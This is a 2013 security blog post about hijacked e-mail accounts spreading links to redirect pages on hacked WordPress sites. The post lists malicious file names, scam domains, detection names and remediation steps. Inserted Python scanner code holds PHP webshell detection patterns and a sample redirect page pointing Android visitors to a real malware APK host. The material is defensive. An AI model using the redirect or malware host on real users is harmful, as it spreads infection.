Saturday, January 19, 2013

Hacked E-mails and Web Sites Pushing Weight Loss Drug Spam, Round 2

Six months ago, in July 2012, I wrote about "Hacked E-mails and Web Sites Pushing Weight Loss Drug Spam."

Now in January 2013, hackers and scammers are up to the same tricks.

(If you believe you may have been victimized, you can skip to the bottom for suggestions.)

I've recently received three e-mails from two hacked Yahoo! accounts owned by people I know. Each e-mail contained only a link and no explanatory text, and the subject line was blank.

In each case, the link address contained a directory called "wp-content", which indicates that these spammed pages were hosted on hacked WordPress blogs (although I later discovered other hacked sites without wp-content in the URL, so the absence of that directory name doesn't rule out a hacked site).
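The pattern described above (blank subject, a body consisting of nothing but a link, and often a wp-content path) is easy to turn into a mail-filter rule. The following Python script is an added example, not code from the original post; the two sample messages are constructed here, the domain hacked-blog.example is a placeholder, and the function name score_message is my own. The wp-content check is scored only as a supporting indicator, since some of the hacked sites seen later lacked it.

```python
"""Flag e-mails matching the link-only pattern described above.

Added example, not from the original post.  Sample messages are constructed.
"""
import email
import re
from email import policy

# A body that is exactly one URL and nothing else.
URL_RE = re.compile(r"^https?://\S+$", re.IGNORECASE)

# Constructed sample messages; hacked-blog.example is a placeholder domain and
# fogjlop.html is one of the file names listed in the post.
SPAM_RAW = (
    "From: friend@example.com\n"
    "To: me@example.com\n"
    "Subject: \n"
    "Content-Type: text/plain; charset=utf-8\n"
    "\n"
    "http://hacked-blog.example/wp-content/uploads/fogjlop.html\n"
)

HAM_RAW = (
    "From: friend@example.com\n"
    "To: me@example.com\n"
    "Subject: Lunch tomorrow?\n"
    "Content-Type: text/plain; charset=utf-8\n"
    "\n"
    "Hi, are you free at noon? Menu is at http://cafe.example/menu\n"
)


def extract_text(raw):
    """Return the plain-text body of a raw RFC 822 message (first text/plain part)."""
    msg = email.message_from_string(raw, policy=policy.default)
    part = msg.get_body(preferencelist=("plain",))
    return part.get_content() if part is not None else ""


def score_message(raw):
    """Return the indicators found in one raw message and an overall verdict."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = (msg["Subject"] or "").strip()
    body = extract_text(raw).strip()

    indicators = {
        "blank_subject": subject == "",
        # No explanatory text at all, just the link.
        "link_only_body": bool(URL_RE.match(body)) and len(body.split()) == 1,
        # Supporting indicator only: later samples lacked wp-content in the URL.
        "wp_content_path": "/wp-content/" in body.lower(),
    }
    # Blank subject plus a bare link is the signature; wp-content raises confidence.
    if indicators["blank_subject"] and indicators["link_only_body"]:
        verdict = "suspicious"
    else:
        verdict = "ok"
    return {"indicators": indicators, "verdict": verdict}


if __name__ == "__main__":
    for name, raw in (("spam", SPAM_RAW), ("ham", HAM_RAW)):
        print(name, score_message(raw))
```

A rule like this is best used to quarantine or tag rather than to drop mail outright: a friend really can send a bare link, and the senders here were real contacts whose accounts had been taken over, so the From address is no help.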

At least one of these hacked blogs was using an outdated version of WordPress (3.3.1). One site didn't display the version number. Surprisingly, the third hacked site was actually running the current version of WordPress (3.5). Most often when I've seen hacked WordPress sites they've been running an old version of WordPress for which there are publicly disclosed vulnerabilities. A current WordPress core is no guarantee, though: an outdated plugin or theme, a stolen FTP or administrator password, or another compromised account on the same shared host can all give an attacker the same write access to wp-content.

If a victim clicks on the link in one of these e-mails, which appears to come from someone they know, they land on a page that either displays the text "You see this page because one of your friends have invited you. Page loading, please wait...." before redirecting, or redirects automatically right away or after a delay of 1 to 5 seconds.

The victim is then redirected to one of three types of sites:
  1. a fake Fox news site advertising a "Raspberry Ultra Drops" weight loss drug, which the site implies is endorsed by television host Dr. Oz (see screenshot below)
  2. a fake CNBC news site advertising a "work from your home" scam; see my June 2012 article about related fake news sites at Sophos' Naked Security blog for lots of details and screenshots
  3. a site specifically for those who clicked on the e-mail link on an Android device (which reportedly attempts to install Android malware; see below)
(Screenshot: a fraudulent site purporting to be Fox News)

Based on an article at Lookout Mobile Security and one of the comments there, apparently the Android-specific redirection leads to (or at one time led to) a file named "Update.apk", a malicious Android app. It appears that as of the last time this file was uploaded to VirusTotal, 32 out of 46 antivirus engines detected it as malware and identified it as one of the following:

Andr/Notcom-A, Android_dc.MK, Android:NotCom-A [Trj], Android.Notcompatible, Android.Notcompatible.A4ad, Android.Proxy.1.origin, Android.Troj.Undef.(kcloud), Android.Trojan.NotCompatible.A, Android.Trojan.NotCompatible.A (B), Android/NoComA.A, Android/NotCompatible.A!tr.bdr, Android/NotCompatible.A.2, AndroidOS_FAKEUPDATES.VL, AndroidOS/GenBl.0B2E9A9E!Olympus, AndroidOS/MalAndroid, Backdoor.AndroidOS.Nisev.a, Backdoor/AndroidOS.bqz, Backdoor/AndroidOS.Nisev, HEUR:Backdoor.AndroidOS.Nisev.a, NotComp.A, TROJ_GEN.F47V1211, Trojan, Trojan:AndroidOS/NoCom.A, Trojan.AndroidOS.NoCom, Trojan.AndroidOS.NoCom.a (v), Trojan.Nisev.bdokyh, UnclassifiedMalware

Following are some of the file names that may be found in a directory on one of the hacked sites. Based on my investigation into the similar hack/spam/fraud campaign last July, I am certain that this is not an exhaustive list of file names. (In fact, I observed that additional files with different names appeared within just the past few hours on one hacked site while I was writing this article.) Note that the links below lead to VirusTotal scan reports, NOT the files themselves.

111a.php, addht.php, avmdkg.php, bhesp.php, biokrls.html, bjsdvs.php, bonuspack.php, casualwor.php, cizxusod.php, colsdj.php, conneng.php, creatives.php, curioso.html, dgjdgs.php, dsfv.php, dspvs.php, duna.php, dwncst.php, ebolsg.php, enjslol.html, eopikal.html, etheha.php, fbgogos.php, firstfight.php, fkbmns.php, fogjlop.html, foglsd.php, fpbs.php, frnds.php, fusion.php, fvcagex.php, fvjsvg.php, gbdlg.php, gdkedns.php, geopic.php, gfobnd.php, ghsakl.html, gjuk.php, gnslfs.php, gsm.php, hamiltons.php, hellodear.php, helpsx.php, hposvds.php, ikhkjskl.php, j.php, jhikdba.php, kawabagga.html, kawabangas.php, kllem.php, mainats.php, maincl.php, mainx.php, makoler.html, ndold.php, newinform.php, newsts.php, nextgt.php, nmklsi.php, nwmslck.php, odnhgls.html, ofneg.php, ornvls.php, pdklsa.php, pmcntr.php, privsek.html, rcccy.php, rcctm.php, ronnd.php, rtebcsw.php, SanFrancisco.htm, saweg.php, stesa.php, stndrt.php, unitds.php, upmlc.php, vghjdk.php, vozivapso.php, wmnhl.php, wrvfsfd.php, xdll.php, xhjg.php, xxxxjs.php, yahmlc.php, yepyep.php, yiTUdso.html, youranswerrr.php, zjgfnwe.php

These files have rather low detection rates by major antivirus engines: a few of the redirection files are currently not detected at all, and even the best-detected ones are flagged by only 14 out of 46 engines. Thus there's a pretty good chance that your antivirus software won't detect these Web pages as malicious. The files that are detected are identified as any of the following types of malware (or similar names):

HTML:Redirector-AI, HTML:Redirector-AI [Trj], HTML:RedirME-inf, HTML:RedirME-inf [Trj], HTML:Refresher-A, HTML:Refresher-A [Trj], HTML.Redirector, HTML.RedirME, HTML.Refresher, JS:Redirector-AAC [Trj], JS.A.Redirector.336, JS.A.Redirector.340.A, JS.A.Redirector.341, JS.A.Redirector.412.A, JS/Redirector.PN, JS/Redirector.WB!tr, TROJ_GEN.F47V0108, TROJ_GEN.F47V0109, TROJ_GEN.F47V0114, TROJ_GEN.F47V0115, TROJ_GEN.F47V0116, TROJ_GEN.F47V0118, TROJ_GEN.F47V1228, TROJ_GEN.F47V1229, TROJ_GEN.RCBH1I4, TROJ_GEN.RCBH1I5, TROJ_GEN.RCBH1IA, TROJ_GEN.RCBH1IK, TROJ_GEN.RCBH1J8, TROJ_GEN.RCBH1JN, Trojan.JS.Redirector, Trojan.JS.Redirector (A), Trojan.JS.Redirector.ASR, Trojan.JS.Redirector.ASR (B), Trojan.JS.Redirector.wb, UnclassifiedMalware

One file was rather different from the rest: gsm.php. This file had an 18/46 detection rate on VirusTotal, and the antivirus engines that detected it identified it as a PHP shell backdoor. A C99-style shell gives whoever planted it a browser-based file manager and command prompt on the server, which is how the redirect files can be re-uploaded or renamed after a cleanup that only deletes the visible pages:

Backdoor, Backdoor:PHP/C99shell.R, Backdoor.HTML.EMO.D, Backdoor.HTML.PHPShell-Interface (v), Backdoor.PHP.C99Shell, C99Shell.CX, EXP/C99Shell.W, Exploit.C99Shell.Gen, HTML:Shellface-D, HTML:Shellface-D [Trj], HTML/Shellnine.A, PHP/BackDoor.AO, PHP/C99Shell.A, PHP/C99shell.R, PHP/CShell.Y, Trojan.Html.C99Shell.dwlsk, Trojan/PHP.Shell
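Since antivirus detection of these pages is so spotty, a site owner is better off triaging the file system directly. The following Python script is an added example, not the post's own tooling: it walks a WordPress tree and flags the three kinds of file described above (meta-refresh and JavaScript redirect pages, pages that branch on an Android user agent, and PHP shells), plus any PHP file sitting in wp-content/uploads, which should only hold media. The signature patterns are illustrative and deliberately broad, and the sample tree is constructed inline: the file names are taken from the list above, the redirect targets are domains from the list further down, and the contents are inert stand-ins written for this example.

```python
"""Scan a WordPress tree for redirect pages and PHP shells of the kind described above.

Added example, not the post's own tooling.  The signatures are illustrative,
and the sample files are constructed inline (inert stand-ins) so it runs offline.
"""
import hashlib
import os
import re
import tempfile

# Constructed stand-ins.  File names come from the post's list, the redirect
# targets come from the post's domain list, the contents are synthetic.
SAMPLE_FILES = {
    "wp-content/uploads/fogjlop.html": (
        '<html><head><meta http-equiv="refresh" content="3;url=http://fxsnws24.com/">'
        "</head><body>You see this page because one of your friends have invited you. "
        "Page loading, please wait....</body></html>"
    ),
    "wp-content/uploads/biokrls.html": (
        "<script>if(navigator.userAgent.match(/android/i)){"
        "window.location='http://194.60.242.54/Update.apk';}else{"
        "window.location='http://fxsnws24.com/';}</script>"
    ),
    # 'Li4u' is just base64 for '...'; a real shell carries a large payload here.
    "wp-content/uploads/gsm.php": "<?php eval(base64_decode('Li4u')); ?>",
    "wp-content/themes/twentytwelve/index.php": "<?php get_header(); get_footer(); ?>",
}

# (signature name, pattern).  Broad on purpose: the goal is triage, not a verdict.
SIGNATURES = [
    ("meta_refresh", re.compile(r"<meta\s+http-equiv\s*=\s*[\"']?refresh", re.I)),
    ("js_redirect", re.compile(
        r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=|location\.replace\s*\(", re.I)),
    ("php_header_redirect", re.compile(r"header\s*\(\s*[\"']Location:", re.I)),
    # Android-specific branch: a user-agent check within 200 chars of the word android.
    ("ua_sniff_android", re.compile(
        r"(?:navigator\.userAgent|HTTP_USER_AGENT)[\s\S]{0,200}?android", re.I)),
    ("php_shell", re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
        r"|(?:shell_exec|passthru|system|exec)\s*\(\s*\$_(?:GET|POST|REQUEST)"
        r"|c99shell", re.I)),
]


def classify(rel_path, text):
    """Return the sorted list of signature names that fire on one file."""
    tags = {name for name, rx in SIGNATURES if rx.search(text)}
    norm = rel_path.replace(os.sep, "/").lower()
    # uploads/ should only hold media; PHP there is a classic sign of injection.
    if "/uploads/" in norm and norm.endswith(".php"):
        tags.add("php_in_uploads")
    return sorted(tags)


def scan_tree(root):
    """Walk root; return {relative_path: {"tags": [...], "sha256": hex}} for files that fired."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".html", ".htm", ".js")):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            tags = classify(rel, data.decode("utf-8", errors="replace"))
            if tags:
                # The SHA-256 is what you look up on VirusTotal before touching the file.
                findings[rel] = {"tags": tags, "sha256": hashlib.sha256(data).hexdigest()}
    return findings


def build_sample_tree(base):
    """Write the constructed sample files under base and return base."""
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return base


def demo():
    """Build the sample tree in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_tree(tmp))


if __name__ == "__main__":
    for path, info in sorted(demo().items()):
        print(f"{path}: {', '.join(info['tags'])}  sha256={info['sha256'][:16]}...")
```

Run it against a real install as scan_tree("/var/www/html") (path is an assumption) and treat the output as a worklist: hash each hit, look it up, and compare the file list against a clean backup before deleting anything, because a hit on gsm.php means the redirect pages can simply be put back.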

Following is a list of some of the domains to which these pages attempt to redirect. Note that the links below lead to the Web of Trust reports for each domain, NOT the domains themselves.

194.60.242.54 (the site hosting Android malware), allnewsjob.ru, foxfoxnws.com, foxfxnws.com, foxnews.top10.super.fxpublication.com (a subdomain of fxpublication.com), fx-nwstop.com, fxnew12.com, fxs-news.com, fxsclocks.com, fxsnws24.com, fxsyounews.com, fxx-news.com, fxxnws24.com, greatlifechance.net, homeincomenow10.com, homeincomenow6.com, hot-foxnws.com, journals26.com, life-news1241.ru, lifenews241.ru, msnb21.com, msnb24c.com, mynewstop.com, news1241.ru, newsfoxs.com, newsonlinework.com, njournal24.com, nws5fxs.com, nwsfxs.com, online18work.com, onlinebestnews.ru, raspberryhots.com (purchasing site), raspbuyberry.com (purchasing site), rasptrims.com (purchasing site), slimsfox.com, story29.com, story76.com, topfox24.com, toplastnews.ru, workfromyourhome15.com, workfromyourhome8.com, workinghome31.com, workinghome46.com, workinghome47.com, xtranws.com

What To Do If Your E-mail Account Has Been Hacked

If your e-mail account has been hacked and you can still log into it (if you can't, go through your provider's account recovery process first):
  1. Change your password immediately. Use a good, strong, long, and unique password; if you need some advice, read the detailed explanations of what makes a password secure at GRC's perfect passwords and password haystacks pages. Keep the new password exclusive to this e-mail account; don't reuse it on any other site.
  2. If you used your old password on any other sites, change your passwords at those sites as well (and use a different password at each of them, not the new one you just created for your e-mail account).
  3. If your e-mail provider uses security questions as a password-recovery mechanism (e.g. Yahoo!), change your security questions and answers, and don't choose answers that other people might know or be able to find out about you.
  4. While you are in the account settings, look for anything the intruder may have changed: a recovery e-mail address or phone number you don't recognize, or a forwarding rule or filter that sends copies of your mail elsewhere. If your provider offers it, sign out of all other sessions.
  5. Send an e-mail to your contacts (please use BCC rather than To or CC) asking them to delete any recent e-mails from your account that contained only a link (and if you want, you can suggest that they read this article if they clicked on the link).
  6. It wouldn't hurt to scan your computer for malware (and get a second opinion from a trusted free scanner, for example Windows Defender Offline or another antivirus boot disc, or Sophos' Virus Removal Tool, which can be run alongside your existing antivirus software).
  7. If your e-mail provider has an option to enable two-factor authentication (for example, sending you a code via SMS text message whenever someone tries to log in), enable this option for better security.
  8. Never log into your e-mail from a public computer (for example at a hotel or library) or while connected to a public Wi-Fi network (for example at a restaurant, coffee shop, or airport).
See also this Sophos article for additional tips on how to protect your e-mail accounts.

What To Do If Your Web Site Has Been Hacked

If your Web site has been hacked:
  1. Don't merely delete the files listed above. The gsm.php backdoor described above gives the intruder a way to put them straight back (new files appeared on one hacked site within hours, as noted above), so removing the visible redirect pages without closing the hole only buys a short reprieve. If possible, restore the server from a clean backup, meaning one taken before the compromise, not simply the most recent one.
  2. Scan for rootkits and other malware, and get a second opinion from a trusted free scanner. On a Windows server that could be Windows Defender Offline or another antivirus boot disc; a Linux host needs a rootkit scanner built for that platform.
  3. Change all passwords on the server: the WordPress administrator accounts, the database user, FTP/SFTP and SSH logins, and the hosting control panel. Use good, strong, long, and unique passwords; if you need some advice, read the detailed explanations of what makes a password secure at GRC's perfect passwords and password haystacks pages. While you are at it, check the WordPress user list for administrator accounts you didn't create.
  4. Disable any services you don't use on your server.
  5. Make sure all the software on the server (WordPress core, plugins, themes, Apache, PHP, etc.) is up to date and has all the latest security patches. As noted above, one of the hacked sites was running the current WordPress core, so don't stop at the core version number.
See also this Sophos article for additional tips on how to protect your Web servers.

What To Do If You Clicked On a Link

If you clicked on a link in one of these e-mails, don't panic.
  1. If you entered your credit card number on one of the sites, call your credit card provider to report the fraudulent transaction and follow their instructions and advice; you may need to cancel that card number and get a new card.
  2. If you visited a link on your Android device, you probably only need to worry about infection if you actually installed the Update.apk file (an app downloaded from a Web site doesn't install itself; you would have had to approve it). If you installed it, you can try restoring your Android device from a backup (assuming you have one) and/or install antivirus software such as Sophos Mobile Security (which is free) onto your device to clean up the infection.
  3. If you visited a link on your PC, for your own peace of mind you may wish to scan your computer for malware (and get a second opinion from a trusted free scanner, for example Windows Defender Offline or another antivirus boot disc, or Sophos' Virus Removal Tool, which can be run alongside your existing antivirus software).
  4. If you visited a link on your Mac, for your own peace of mind you may wish to scan your computer for malware (if you don't have antivirus software, you can get free Mac antivirus software from Sophos for home use, or get a free trial of a security suite from Intego).
  5. If you visited a link on your iPhone or iPad, you probably don't have anything to worry about as long as you didn't enter your credit card information on one of the sites.


For more from the JoshMeister on Security, please subscribe via e-mail or RSS, or follow me on Twitter.

3 comments:

  1. Hi,

    I got hit with this a couple days ago. I opened a weird message from my wife "i have sent you a skype message
    Read your mail friend request" and the next thing that occurred was that a similar message was sent to every contact from my Mac Mail. I have run 6 of the antivirus programs that you reported are able to find this bug. No antivirus software has found any suspicious files on my Mac. I am still concerned about my security and wonder if you have any other suggestions other than changing passwords (which is done)?

    Thanks,

    Darren

  2. Darren, sorry for my delayed response.

    Since you mention that you're using a Mac, hopefully you already have an antivirus suite installed such as Sophos Anti-Virus for Mac Home Edition (freeware) or Intego VirusBarrier (commercial). I definitely recommend scanning with one of those and leaving it installed.

    I would suggest also trying AdwareMedic (freeware/donationware), a new program developed by my friend Thomas Reed of The Safe Mac — see http://www.adwaremedic.com for a direct download link. You can also try malware scanners available on the Mac App Store. Here are a few that are worth trying, in alphabetic order:

    * Bitdefender Virus Scanner (free)
    * ClamXav (freeware/donationware) — note that there's a more fully featured version at http://www.clamxav.com/download.php
    * Dr.Web Light (used to be free; now $16.99 if you haven't downloaded it previously)

    If you still don't find anything malicious after also scanning with four (or more) of those programs, your Mac likely isn't infected. Hope that helps.

